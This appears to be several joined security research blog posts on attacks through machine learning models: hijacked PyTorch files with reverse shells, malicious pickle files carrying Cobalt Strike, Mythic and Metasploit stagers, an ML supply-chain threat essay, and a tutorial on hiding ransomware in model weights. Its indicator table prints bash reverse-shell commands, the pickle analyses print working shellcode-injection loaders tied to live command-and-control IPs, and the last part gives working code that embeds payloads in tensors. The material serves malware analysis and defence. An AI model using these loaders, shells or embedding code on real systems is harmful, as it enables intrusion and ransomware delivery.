There are also some helpful strings leaked in the model, which allude to the filesystem location where the original files were stored and that the author was trying to create a “deep steganography” payload (and also uses the PyCharm editor on an Ubuntu system with the Anaconda Python distribution!):

/home/ubuntu/Documents/Pycharm Projects/Torch-Pickle-Codes-main/gen-test/simplenet.py
/home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/conv.py
/home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/activation.py
/home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/pooling.py
/home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/linear.py

Next, the payload script will load the torch model from the in-memory data, and then enumerate the layers of the neural network to find the weights of the 7th layer, from which a final stage payload will be extracted. The final stage payload is decoded from the 7th layer’s weights using the _bit_ext function, which is used to flip the order of the bits in the tensor. Finally, the resulting payload is written to a file called extract.pyc, and executed using subprocess.Popen.

The final stage payload is a Python 3.10.0 compiled script, 356 bytes in size. The original filename of the script was “benign.py,” and it was compiled on 2023-02-04 at 07:58:46 (this is the compile timestamp we referenced earlier when comparing with the VT upload time). Compiled Python 3.10 code is a bit of a fiddle to disassemble, but the original code was roughly as follows:

import subprocess
processes = ['notify-send "HELLO!!!!!!" "Your file is compromised"'] + ["zenity --error --text='An error occurred\! Your pc is compromised :) Check your files properly next time :O'"]
for process in processes:
    subprocess.Popen(process, shell=True)

When run, the script spawns the “notify-send” and “zlzenity” Linux commands to alert the user by sending a notification to the desktop. However, the attacker can easily replace the script with something less benign in the future.

Conclusions

Don’t be the victim of a supply-chain attack – if you source your models externally, be it from third-party providers or model hubs, make sure you verify that what you’re getting hasn’t been hijacked. The same goes if you’re providing your models to others – the only thing worse than being on the receiving end of a supply chain attack is being the supplier!

Models are often privy to highly sensitive data, which may be your competitive advantage in your field or your consumer’s personal information. Ensure that you have enforced controls around the deployment of machine learning models and the systems that support them. We recently demonstrated how trivial it is to steal data from S3 buckets if a hijacked model is deployed.

What’s significant about these malicious files is that each has zero hits for detection by any vendor on VirusTotal. To this end, it reaffirms a troubling lack of scrutiny around the problem of code execution through model binaries. Python payloads, especially pickle serialized data leveraging code execution and pre-compiled Python scripts, are also often poorly detected by security solutions and are becoming an appealing choice for targeted attacks, as we’ve seen with the Mythic/Medusa red-teaming framework.

HiddenLayer’s Model Scanner detects all models mentioned in this blog:

The more we look, the more we find – it’s evident that as ML continues to become the zeitgeist of the decade, the more threats we’ll find assailing these systems and those that support them.

Indicators of Compromise


Indicator	Type	Description
2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824	SHA256	rs_dnn_dict.pt spawning bash shell redirecting output to 127.0.0.1
19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a	SHA256	rs_dnn_dict.pt spawning bash shell redirecting output to 172.20.10.2
rs_dnn_dict.pt	Filename	Filename for both reverse shell models
/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'	Command-line	Reverse shell command from 2572cf…7824
/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &'	Command-line	Reverse shell command from 19993c…0d8a
80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2	SHA256	Hijacked SimpleNet model
model.pt	Filename	Filename for the SimpleNet model
extract.pyc	Filename	Final stage payload for the SimpleNet model
780c4e6ea4b68ae9d944225332a7efca88509dbad3c692b5461c0c6be6bf8646	SHA256	extract.pyc final payload from the SimpleNet model

MITRE ATLAS/ATT&CK Mapping


Technique ID	MITRE Framework	Technique Name
AML.T0011.000	ATLAS	User Execution: Unsafe ML Artifacts
AML.T0010.003	ATLAS	ML Supply Chain Compromise: Model
T1059.004	ATT&CK	Command and Scripting Interpreter: Unix Shell
T1059.006	ATT&CK	Command and Scripting Interpreter: Python
T1090.001	ATT&CK	Proxy: Internal Proxy

Research

min read

Supply Chain Threats: Critical Look at Your ML Ops Pipeline

ML supply chain attacks leverage data poisoning and hijacked models to steal data and compromise cloud environments.

In a Nutshell:

A supply chain attack can be incredibly damaging, far-reaching, and an all-round terrifying prospect.
Supply chain attacks on ML systems can be a little bit different from the ones you’re used to.;
ML is often privy to sensitive data that you don’t want in the wrong hands and can lead to big ramifications if stolen.
We pose some pertinent questions to help you evaluate your risk factors and more accurately perform threat modeling.
We demonstrate how easily a damaging attack can take place, showing the theft of training data stored in an S3 bucket through a compromised model.

For many security practitioners, hearing the term ‘supply chain attack’ may still bring on a pang of discomfort and unease - and for good reason. Determining the scope of the attack, who has been affected, or discovering that your organization has been compromised is no easy thought and makes for an even worse reality. A supply-chain attack can be far-reaching and demolishes the trust you place in those you both source from and rely on. But, if there’s any good that comes from such a potentially catastrophic event, it’s that they serve as a stark reminder of why we do cybersecurity in the first place.

To protect against supply chain attacks, you need to be proactive. By the time an attack is disclosed, it may already be too late - so prevention is key. So too, is understanding the scope of your potential exposure through supply chain risk management. Hopefully, this sounds all too familiar, if not, we’ll lightly cover this later on.

The aim of this blog is to highlight the similarly affected technologies involved within the Machine Learning supply chain and the varying levels of risk involved. While it bears some resemblance to the software supply chain you’re likely used to, there are a few key differences that set them apart. By understanding this nuance, you can begin to introduce preventative measures to help ensure that both your company and its reputation are left intact.

The Impact

Over the last few years, supply chain attacks have been carved into the collective memory of the security community through major attacks such as SolarWinds and Kaseya - amongst others. With the SolarWinds breach, it is estimated that close to a hundred customers were affected through their compromised Orion IT management software, spanning public and private sector organizations alike. Later, the Kaseya incident reportedly affected over a thousand entities through their VSA management software - ultimately resulting in ransomware deployment.

The magnitude of the attacks kicked the industry into overdrive - examining supply-side exposure, increasing scrutiny on 3rd party software, and implementing more holistic security controls. But it’s a hard problem to solve, the components of your supply chain are not always apparent, especially when it’s constantly evolving.

The Root Cause

So what makes these attacks so successful - and dangerous? Well, there are two key factors that the adversary exploits:

Trust - Your software provider isn’t an APT group, right? The attacker abuses the existing trust between the producer and consumer. Given the supplier’s prevalence and reputation, their products often garner less scrutiny and can receive more lax security controls.
Reach - One target, many victims. The one-to-many business model means that an adversary can affect the downstream customers of the victim organization in one fell swoop.

The ML Supply Chain

ML is an incredibly exciting space to be in right now, with huge advances gracing the collective newsfeed almost every week. Models such as DALL-E and Stable Diffusion are redefining the creative sphere, while AlphaTensor beats 50-year-old math records, and ChatGPT is making us question what it means to be human. Not to mention all the datasets, frameworks, and tools that enable and support this rapid progress. What’s more, outside of the computing cost, access to ML research is largely free and readily available for you to download and implement in your own environment.;

But, like one uncle to a masked hero said - with great sharing, comes great need for security - or something like that. Using lessons we’ve learned from dealing with past incidents, we looked at the ML Supply Chain to understand where people are most at risk and provided some questions to ask yourself to help evaluate your risk factors:

Data Collection

A model is only as good as the dataset that it’s trained on, and it can often prove difficult to gather appropriate real-world data in-house. In many cases, you will have to source your dataset externally - either from a data-sharing repository or from a specific data provider. While often necessary, this can open you up to the world of data poisoning attacks, which may not be realized until late into the MLOps lifecycle. The end result of data poisoning is the production of an inaccurate, flawed, or subverted model, which can have a host of negative consequences.

Is the data coming from a trusted source? e.g., You wouldn’t want to train your medical models on images scraped from a subreddit!
Can the integrity of the data be assured?
Can the data source be easily compromised or manipulated? See Microsoft's 'Tay'.

Model Sourcing

One of the most expensive parts of any ML pipeline is the cost of training your model - but it doesn’t always have to be this way. Depending on your use case, building advanced complex models can prove to be unnecessary, thanks to both the accessibility and quality of pre-trained models. It’s no surprise that pre-trained models have quickly become the status quo in ML - as this compact result of vast, expensive computation can be shared on model repositories such as HuggingFace, without having to provide the training data - or processing power.

However, such models can contain malicious code, which is especially pertinent when we consider the resources ML environments often have access to, such as other models, training data (which may contain PII), or even S3 buckets themselves.

Is it possible that the model has been hijacked, tampered or compromised in some other manner?;
Is the model free of backdoors that could allow the attacker to routinely bypass it by giving it specific input?
Can the integrity of the model be verified?
Is the environment the model is to be executed in as restricted as possible? E.g., ACLs, VPCs, RBAC, etc

ML Ops Tooling

Unless you’re painstakingly creating your own ML framework, chances are you depend on third-party software to build, manage and deploy your models. Libraries such as TensorFlow, PyTorch, and NumPy are mainstays of the field, providing incredible utility and ease to data scientists around the world. But these libraries often depend on additional packages, which in turn have their own dependencies, and so on. If one such dependency was compromised or a related package was replaced with a malicious one, you could be in big trouble.

A recent example of this is the ‘torchtriton’ package which, due to dependency confusion with PyPi, affected PyTorch-nightly builds for Linux between the 25th and 30th of December 2022. Anyone who downloaded the PyTorch nightly in this time frame inadvertently downloaded the malicious package, where the attacker was able to hoover up secrets from the affected endpoint. Although the attacker claims to be a researcher, the theft of ssh keys, passwd files, and bash history suggests otherwise.

If that wasn’t bad enough, widely used packages such as Jupyter notebook can leave you wide open for a ransomware attack if improperly configured. It’s not just Python packages, though. Any third-party software you employ puts you at risk of a supply chain attack unless it has been properly vetted. Proper supply chain risk management is a must!

What packages are being used on the endpoint?
Is any of the software out-of-date or contain known vulnerabilities?
Have you verified the integrity of your packages to the best of your ability?
Have you used any tools to identify malicious packages? E.g., DataDog’s GuardDog

Build & Deployment

While it could be covered under ML Ops tooling, we wanted to draw specific attention to the build process for ML. As we saw with the SolarWinds attack, if you control the build process, you control everything that gets sent downstream. If you don’t secure your build process sufficiently, you may be the root cause of a supply chain attack as opposed to the victim.

Are you logging what’s taking place in your build environment?
Do you have mitigation strategies in place to help prevent an attack?
Do you know what packages are running in your build environment?
Are you purging your build environment after each build?
Is access to your datasets restricted?

As for deployment - your model will more than likely be hosted on a production system and exposed to end users through a REST API, allowing these stakeholders to query it with their relevant data and retrieve a prediction or classification. More often than not, these results are business-critical, requiring a high degree of accuracy. If a truly insidious adversary wanted to cause long-term damage, they might attempt to degrade the model’s performance or affect the results of the downstream consumer. In this situation, the onus is on the deployer to ensure that their model has not been compromised or its results tampered with.

Is the integrity of the model being routinely verified post-deployment?
Do the model’s outputs match those of the pre-deployment tests?
Has drift affected the model over time, where it’s now providing incorrect results?
Is the software on the deployment server up to date?
Are you making the best use of your cloud platform's security controls?

A Worst Case Scenario - SageMaker Supply Chain Attack

A picture paints a thousand words, and as we’re getting a little high on word count, we decided to go for a video demonstration instead. To illustrate the potential consequences of an ML-specific supply chain attack, we use a cloud-based ML development platform - Amazon Sagemaker and a hijacked model - however it could just as well be a malicious package or an ML-adjacent application with a security vulnerability. This demo shows just how easy it is to steal training data from improperly configured S3 buckets, which could be your customers’ PII, business-sensitive information, or something else entirely.

https://youtu.be/0R5hgn3joy0

Mitigating Risk

It Pays to Be Proactive

By now, we’ve heard a lot of stomach-churning stuff, but what can we do about it? In April of 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a 16-page security advisory to advise organizations on how to defend themselves through a series of proactive measures to help prevent a supply chain attack from occurring. More specifically, they talk about using frameworks such as Cyber Supply Chain Risk Management (C-SCRM) and Secure Software Development Framework (SSDF). We wish that ML was free of the usual supply chain risks, many of these points still hold true - with some new things to consider too.

Integrity & Verification

Verify what you can, and ensure the integrity of the data you produce and consume. In other words, ensure that the files you get are what you hoped you’d get. If not, you may be in for a nasty surprise. There are many ways to do this, from cryptographic hashing to certificates to a deeper dive manual inspection.

Keep Your (Attack) Surfaces Clean

If you’re a fan of cooking, you’ll know that the cooking is the fun part, and the cleanup - not so much. But that cleanup means you can cook that dish you love tomorrow night without the chance of falling ill. By the same virtue, when you’re building ML systems, make sure you clean up any leftover access tokens, build environments, development endpoints, and data stores. If you clean as you go, you’re mitigating risk and ensuring that the next project goes off without a hitch. Not to mention - a spring clean in your cloud environment may save your organization more than a few dollars at the end of the month.

Model Scanning

In past blogs, we’ve shown just how dangerous a model can be and highlighted how attackers are actively using model formats such as Pickle as a launchpad for post-exploitation frameworks. As such, it’s always a good idea to inspect your models thoroughly for signs of malicious code or illicit tampering. We released Yara rules to aid in the detection of particular varieties of hijacked models and also provide a model scanning service to provide an added layer of confidence.

Cloud Security

Make use of what you’ve got, many cloud service providers provide some level of security mechanisms, such as Access Control Lists (ACLs), Virtual Private Cloud (VPCs), Role Based Access Control (RBAC), and more. In some cases, you can even disconnect your models from the internet during training to help mitigate some of the risks - though this won’t stop an attacker from waiting until you’re back online again.

In Conclusion

While being in a state of hypervigilance can be tiring, looking critically at your ML Ops pipeline every now and again is no harm, in fact, quite the opposite. Supply-chain attacks are on the rise, and the rules of engagement we’ve learned through dealing with them very much apply to Machine Learning. The relative modernity of the space, coupled with vast stores of sensitive information and accelerating data privacy regulation means that attacks on ML supply chains have the potential to be explosively damaging in a multitude of ways.

That said, the questions we pose in this blog can help with threat modeling for such an event, mitigate risk and help to improve your overall security posture.

Research

min read

Pickle Files: The New ML Model Attack Vector

Adversaries are weaponizing Python's pickle format to hide Cobalt Strike and Mythic C2 agents in machine learning models.

Introduction

In our previous blog post, “Weaponizing Machine Learning Models with Ransomware”, we uncovered how malware can be surreptitiously embedded in ML models and automatically executed using standard data deserialization libraries - namely pickle.;

Shortly after publishing, several people got in touch to see if we had spotted adversaries abusing the pickle format to deploy malware - and as it transpires, we have.

In this supplementary blog, we look at three malicious pickle files used to deploy Cobalt Strike, Metasploit and Mythic respectively, with each uploaded to public repositories in recent months. We provide a brief analysis on these files to show how this attack vector is being actively exploited in the wild.;

Findings

Cobalt Strike Stager

SHA256: 391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176

The first malicious pickle file (serialized with pickle protocol version 3) was uploaded in January 2022 and uses the built-in Python exec function to execute an embedded Python script. The script relies on the ctypes library to invoke Windows APIs such as VirtualAlloc and CreateThread. In this way, it injects and runs a 64-bit Cobalt Strike stager shellcode.

We’ve used a simple pickle “disassembler” based on code from Kaitai Struct (http://formats.kaitai.io/python_pickle/) to highlight the opcodes used to execute each payload:

\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode: 
import ctypes,urllib.request,codecs,base64
AbCCDeBsaaSSfKK2 = "WEhobVkxeDRORGhj" // shellcode, truncated for readability
AbCCDe = base64.b64decode(base64.b64decode(AbCCDeBsaaSSfKK2))
AbCCDe =codecs.escape_decode(AbCCDe)[0]
AbCCDe = bytearray(AbCCDe)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(AbCCDe)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(AbCCDe)).from_buffer(AbCCDe)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(AbCCDe)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop

The base64 encoded shellcode from this sample connects to https://121.199.68[.]210/Swb1 with a unique User-Agent string Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP09; NP09; MAAU)

The IP hardcoded in this shellcode appears in various intel feeds in relation to CobaltStrike activity; a few different CobaltStrike stagers were spotted talking to this IP, and a beacon DLL, which used to be hosted there at some point, features a watermark that is associated with many cybercriminal groups, including TrickBot/SmokeLoader, Nobelium, and APT29.

Mythic Stager

SHA256: 806ca6c13b4abaec1755de209269d06735e4d71a9491c783651f48b0c38862d5

The second sample (serialized using pickle protocol version 4) appeared in the wild in July 2022. It’s rather similar to the first one in the way it uses the ctypes library to load and execute a 32-bit Cobalt Strike stager shellcode.

\x80 proto: 4
\x95 frame: 5397
\x8c short_binunicode: builtins
\x94 memoize
\x8c short_binunicode: exec
\x94 memoize
\x93 stack_global
\x94 memoize
\x58 binunicode: 
import base64
import ctypes
import codecs
shellcode= "" // removed for readability
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1))

\x94 memoize
\x85 tuple1
\x94 memoize
\x52 reduce
\x94 memoize
\x2e stop

In this case, the shellcode connects to 43.142.60[.]207:9091/7Iyc with the User-Agent set to Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

The hardcoded IP address was recently mentioned in the Team Cymru report on Mythic C2 framework. Mythic is a Python-based post-exploitation red teaming platform and an open source alternative to Cobalt Strike. By pivoting on the E-Tag value that is present in HTTP headers of Mythic-related requests, Team Cymru researchers were able to find a list of IPs that are likely related to Mythic - and this IP was one of them.;

What’s interesting is that just over 4 months ago (August 2022) Mythic introduced a pickle wrapper module that allows for the C2 agent to be injected into a pickle-serialized machine learning model! This means that some pentesting exercises already consider ML models as an attack vector. However, Mythic is known to be used not only in red teaming activities, but also by some notorious cybercriminal groups, and has been recently spotted in connection to a 2022 campaign targeting Pakistani and Turkish government institutions, as well as spreading BazarLoader malware.

Metasploit Stager

SHA256: 9d11456e8acc4c80d14548d9fc656c282834dd2e7013fe346649152282fcc94b

This sample appeared under the name of favicon.ico in mid-November 2022, and features a bit more obfuscation than the previous two samples. The shellcode injection function is encrypted with AES-ECB with a hardcoded passphrase hello_i_4m_cc_12. The shellcode itself is computed using an arithmetic operation on a large int value and contains a Metasploit reverse-tcp shell that connects to a hardcoded IP 1.15.8.106 on port 6666.

\x80 proto: 3
\x63 global_opcode: builtins exec
\x71 binput: 0
\x58 binunicode: 
import subprocess
import os
import time
from Crypto.Cipher import AES
import base64
from Crypto.Util.number import *
import random
while True:    
    ret = subprocess.run("ping baidu.com -n 1", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if ret.returncode==0:
        key=b'hello_i_4m_cc_12'
        a2=b'p5uzeWCm6STXnHK3 [...]' // truncated for readability
        enc=base64.b64decode(a2)
        ae=AES.new(key,AES.MODE_ECB)
        num2=9287909549576993 [...] // truncated for readability
        num1=(num2//888-777)//666
        buf=long_to_bytes(num1)
        exec(ae.decrypt(enc))
    elif ret.returncode==1:
        time.sleep(60)

\x71 binput: 1
\x85 tuple1
\x71 binput: 2
\x52 reduce
\x71 binput: 3
\x2e stop

The decrypted injection code is very much the same as observed previously, with Windows APIs being invoked through the ctypes library to inject the payload into executable memory and run it via a new thread.

import ctypes
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c

The decoded shellcode turns out to be a 64-bit reverse-tcp stager:

The hardcoded IP address is located in China and was acting as a Cobalt Strike C2 server as late as of October 2022, according to multiple Cobalt Strike trackers.

Conclusions

Although we can't be 100% sure that the described malicious pickle files have been used in real-world attacks (as we lack enough contextual information), our findings definitively prove that the adversaries are already looking into this attack vector as a method of malware deployment. The IP addresses hardcoded in the above samples have been used in other in-the-wild malware, including various instances of Cobalt Strike and Mythic stagers, suggesting that these pickle-serialized shellcodes were not part of a legitimate research or a red teaming activity. This emerging trend highlights the intersection of adversarial machine learning and AI data poisoning, where attackers could manipulate the integrity of machine learning models by injecting malicious code via compromised datasets or models. As some of the post-exploitation and so-called “adversary emulation” frameworks are starting to build support for this attack vector, it’s only a matter of time until we see such attacks on the rise.

We’ve put together a set of YARA rules to detect malicious/suspicious pickle files which can be found in HiddenLayer's public BitBucket repository.

For more information on how model injection works, what are the possible case scenarios and consequences, and how can we mitigate the risks - check out our detailed blog on Weaponizing Machine Learning Models.;

Indicators of Compromise


Indicator	Type	Description
391f5d0cefba81be3e59e7b029649dfb32ea50f72c4d51663117fdd4d5d1e176	SHA256	Cobalt Strike Stager
806ca6c13b4abaec1755de209269d06735e4d71a9491c783651f48b0c38862d5	SHA256	Mythic Stager
9d11456e8acc4c80d14548d9fc656c282834dd2e7013fe346649152282fcc94b	SHA256	Metasploit Stager
121.199.68[.]210	IP	Cobalt Strike Stager
43.142.60[.]207	IP	Mythic Stager
1.15.8[.]106	IP

Research

min read

Weaponizing ML Models with Ransomware

Machine learning models can hide ransomware in their weights using steganography and execute it via insecure pickle deserialization.

Introduction

In our latest blog installment, we’re going to investigate something a little different. Most of our posts thus far have focused on mapping out the adversarial landscape for machine learning, but recently we’ve gotten to wondering: could someone deploy malware, for example, ransomware, via a machine learning model? Furthermore, could the malicious payload be embedded in such a way that is (currently) undetected by security solutions, such as anti-malware and EDR?

With the rise in prominence of model zoos such as HuggingFace and TensorFlow Hub, which offer a variety of pre-trained models for anyone to download and utilize, the thought of a bad actor being able to deploy malware via such models, or hijack models prior to deployment as part of a supply chain, is a terrifying prospect indeed.

The security challenges surrounding pre-trained ML models are slowly gaining recognition in the industry. Last year, TrailOfBits published an article about vulnerabilities in a widely used ML serialization format and released a free scanning tool capable of detecting simple attempts to exploit it. One of the biggest public model repositories, HuggingFace, recently followed up by implementing a security scanner for user-supplied models. However, comprehensive security solutions are currently very few and far between. There is still much to be done to raise general awareness and implement adequate countermeasures.

In the spirit of raising awareness, we will demonstrate how easily an adversary can deploy malware through a pre-trained ML model. We chose to use a popular ransomware sample as the payload instead of the traditional benign calc.exe used in many proof-of-concept scenarios. The reason behind it is simple: we hope that highlighting the destructive impact such an attack can have on an organization will resonate much more with security stakeholders and bring further attention to the problem.

For the purpose of this blog, we will focus on attacking a pre-trained ResNet model called ResNet18. ResNet provides a model architecture to assist in deep residual learning for image recognition. The model we used was pre-trained using ImageNet, a dataset containing millions of images with a thousand different classes, such as tench, goldfish, great white shark, etc. The pre-trained weights and biases we use were stored using PyTorch, although, as we will demonstrate later on, our attack can work on most deep neural networks that have been pre-trained and saved using a variety of ML libraries.

Without further ado, let’s delve into how ransomware can be automatically launched from a machine-learning model. To begin with, we need to be able to store a malicious payload in a model in such a way that it will evade the scrutiny of an anti-malware scanning engine.

What’s In a Neuron?

In the world of deep learning artificial neural networks, a “neuron” is a node within a layer of the network. Just like its biological counterpart, an artificial neuron receives input from other neurons – or the initial model input, for neurons located in the input layer – and processes this input in a certain way to produce an output. The output is then propagated to other neurons through connections called synapses. Each synapse has a weight value associated with it that determines the importance of the input coming through this connection. A neuron uses these values to compute a weighted sum of all received inputs. On top of that, a constant bias value is also added to the weighted sum. The result of this computation is then given to the neuron’s activation function that produces the final output. In simple mathematical terms, a single neuron can be described as:

As an example, in the following overly simplified diagram, three inputs are multiplied with three weight values, added together, and then summed with a bias value. The values of the weights and biases are precomputed during training and refined using a technique called backpropagation. Therefore, a neuron can be considered a set of weights and bias values for a particular node in the network, along with the node’s activation function.

*Figure 1: Simplified diagram of a neuron*

But how is a “neuron” stored? For most neural networks, the parameters, i.e., the weights and biases for each layer, exist as a multidimensional array of floating point numbers (generally referred to as a tensor), which are serialized to disk as a binary large object (BLOB) when saving a model. For PyTorch models, such as our ResNet18 model, the weights and biases are stored within a Zip file, with the model structure stored in a file called data.pkl that tells PyTorch how to reconstruct each layer or tensor. Spread across all tensors, there are roughly 44 MB of weights and biases in the ResNet18 model (so-called because it has 18 convolutional layers), which is considered a small model by modern standards. For example, ResNet101, with 101 convolutional layers, contains nearly 170MB of weights and biases, and other language and computer vision models are larger still.

When viewed in a hex editor, the weights may look as seen on the screenshot below:

code table — *Figure 2: Hex dump of the weights from layer4.0.conv2.weight of our pre-trained ResNet18 model*

For many common machine learning libraries, such as PyTorch and TensorFlow, the weights and biases are represented using 32-bit floating point values, but some models can just as easily use 16 or 64-bit floats as well (and a rare few even use integers!).

At this point, it’s worth a quick refresher as to the IEEE 754 standard for floating-point arithmetic, which defines the layout of a 32-bit floating-point value as follows:

Figure 3: Bit representation of a 32-bit floating point value

Double precision floating point values (64-bit) have a few extra bits afforded to the exponent and fraction (mantissa):

So how might we exploit this to embed a malicious payload?

Preying Mantissa

For this blog, we will focus on 32-bit floats, as this tends to be the most common data type for weights and biases in most ML models. If we refer back to the hex dump of the weights from our pre-trained ResNet18 model (pictured in Figure 1), we notice something interesting; the last 8-bits of the floating point values, comprising the sign bit and most of the exponent, are typically 0xBC, 0xBD, 0x3C or 0x3D (note, we are working in little-endian). How might these values be exploited to store a payload?

Let’s take 0xBC as an example:

0xBC = 10111100b

Here the sign bit is set (so the value is negative), and a further 4 bits are set in the exponent. When converted to a 32-bit float, we get the value:

-0.0078125

But what happens if we set all the remaining bits in the mantissa (i.e., 0xffff7fbc)? Then we get the value:

-0.015624999068677425

A difference of 0.0078, which seems pretty large in this context (and quite visibly incorrect compared to the initial value). However, what happens if we target even fewer bits, say, just the final 8? Taking the value 0xff0000bc, we now get the value:

-0.007812737487256527

This yields a difference of 0.000000237, which now seems quite imperceptible to the human eye. But how about to a machine learning algorithm? Can we possibly take arbitrary data, split it into n chunks of bits, then overwrite the least significant bits of the mantissa for a given weight, and have the model function as before? It turns out that we can! Somewhat akin to the steganography approaches used to embed secret messages or malicious payloads into images, the same sort of approach works just as well with machine learning models, often with very little loss in overall efficacy (if this is a consideration for an attacker), as demonstrated in the paper EvilModel: Hiding Malware Inside of Neural Network Models.

Tensor Steganography

Before we attempt to embed data in the least significant bits of the float values in a tensor, we need to determine if there is a sufficient number of available bits in a given layer to store the payload, its size, and a SHA256 hash (so we can later verify that it is decoded correctly). Looking at the layers within the ResNet18 model containing more than 1000 float values, we observe the following layers:


Layer Name	Count of Floats	Size in Bytes
fc.bias	1000	4.0 kB
layer2.0.downsample.0.weight	8192	32.8 kB
conv1.weight	SHA256	37.6 kB
layer3.0.downsample.0.weight	9408	131.1 kB
layer1.0.conv1.weight	32768	147.5 kB
layer1.0.conv2.weight	36864	147.5 kB
layer1.1.conv1.weight	36864	147.5 kB
layer1.1.conv2.weight	36864	147.5 kB
layer2.0.conv1.weight	36864	294.9 kB
layer4.0.downsample.0.weight	73728	524.3 kB
layer2.0.conv2.weight	131072	589.8 kB
layer2.1.conv1.weight	147456	589.8 kB
layer2.1.conv2.weight	147456	589.8 kB
layer3.0.conv1.weight	147456	1.2 MB
fc.weight	512000	2.0 MB
layer3.0.conv2.weight	589824	2.4 MB
layer3.1.conv1.weight	589824	2.4 MB
layer3.1.conv2.weight	589824	2.4 MB
layer4.0.conv1.weight	1179648	4.7 MB
layer4.0.conv2.weight	2359296	9.4 MB
layer4.1.conv1.weight	2359296	9.4 MB
layer4.1.conv2.weight	2359296	9.4 MB

Taking the largest convolutional layer, containing 9.4MB of floats (2,359,296 values in a 512x512x3x3 tensor), we can figure out how much data we can embed using 1 to 8 bits of each float’s mantissa:


1-bit	2-bit	3-bit	4-bit	5-bit	6-bit	7-bit	8-bit
294.9 kB	589.8 kB	884.7 kB	1.2 MB	1.5 MB	1.8 MB	2.1 MB	2.4 MB

This looks very promising, and shows that we can easily embed a malicious payload under 2.4 MB in size by only tampering with 8-bits, or less, in each float in a single layer. This should have a negligible effect on the value of each floating point number in the tensor. Seeing as ResNet18 is a fairly small model, many other neural networks have even more space available for embedding payloads, and some can fit over 9 MB worth of payload data in just 3-bits in a single layer!

The following example code will embed an arbitrary payload into the first available PyTorch tensor with sufficient free bits using steganography:

import os
import sys
import argparse
import struct
import hashlib
from pathlib import Path

import torch
import numpy as np

def pytorch_steganography(model_path: Path, payload: Path, n=3):
    assert 1 <= n <= 8

    # Load model
    model = torch.load(model_path, map_location=torch.device("cpu"))

    # Read the payload
    size = os.path.getsize(payload)

    with open(payload, "rb") as payload_file:
        message = payload_file.read()

    # Payload data layout: size + sha256 + data
    payload = struct.pack("i", size) + bytes(hashlib.sha256(message).hexdigest(), "utf-8") + message

    # Get payload as bit stream
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
        
    if len(bits) % n != 0:
        # Pad bit stream to multiple of bit count
        bits = np.append(bits, np.full(shape=n-(len(bits) % n), fill_value=0, dtype=bits.dtype))

    bits_iter = iter(bits)

    for item in model:
        tensor = model[item].data.numpy()

        # Ensure the data will fit
        if np.prod(tensor.shape) * n < len(bits):
            continue

        print(f"Hiding message in layer {item}...")

        # Bit embedding mask
        mask = 0xff
        for i in range(0, tensor.itemsize):
            mask = (mask << 8) | 0xff

        mask = mask - (1 << n) + 1

        # Create a read/write iterator for the tensor
        with np.nditer(tensor.view(np.uint32) , op_flags=["readwrite"]) as tensor_iterator:
            # Iterate over float values in tensor
            for f in tensor_iterator:
                # Get next bits to embed from the payload
                lsb_value = 0
                for i in range(0, n):
                    try:
                        lsb_value = (lsb_value << 1) + next(bits_iter)
                    except StopIteration:
                        assert i == 0

                        # Save the model back to disk
                        torch.save(model, f=model_path)

                        return True

